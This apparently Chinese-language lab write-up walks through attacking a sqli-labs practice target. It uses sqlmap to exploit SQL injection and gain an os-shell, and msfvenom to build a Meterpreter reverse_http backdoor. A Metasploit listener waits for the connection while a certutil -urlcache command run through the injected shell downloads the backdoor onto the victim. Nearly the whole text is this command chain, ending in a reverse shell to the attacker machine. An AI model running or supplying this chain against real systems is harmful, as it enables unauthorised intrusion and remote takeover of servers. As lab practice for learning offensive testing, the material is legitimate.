靶机 sqli-labs靶场 ip:192.168.206.131
攻击机 kali ip:192.168.206.128
sqlmap -u "http://192.168.206.131/sqli-labs/Less-1/?id=1"
sqlmap -u "" --is-dba
判断是否是最高权限用户 发现是 可以进行 高权限操作 -os-shell
msfvenom -p windows/meterpreter/reverse_http lhost=192.168.206.128 lport=9999 -f exe -o sql.exe#生成msf后门
开启监听:
msf6> use exploit/multi/handler
msf6> set lhost 192.168.206.128
msf6> set lport 9999
msf6> run
我这将sql.exe 放在192.168.206.131 的目录下当做 我的远程服务器
python sqlmap.py -u "URL" --os-shell=certutil -urlcache -split -f http://攻击者服务器地址/后门文件 下载到目标机地址下d:/sql.exe #交互式命令执行下载后门 将sql.exe下载到受害机上
sqlmap -u "http://192.168.206.131/sqli-labs/Less-1/?id=1" --os-shell#先获取os-shell
执行命令
反弹成功
反弹成功
[外链图片转存中…(img-GZbl86Uf-1722797040939)]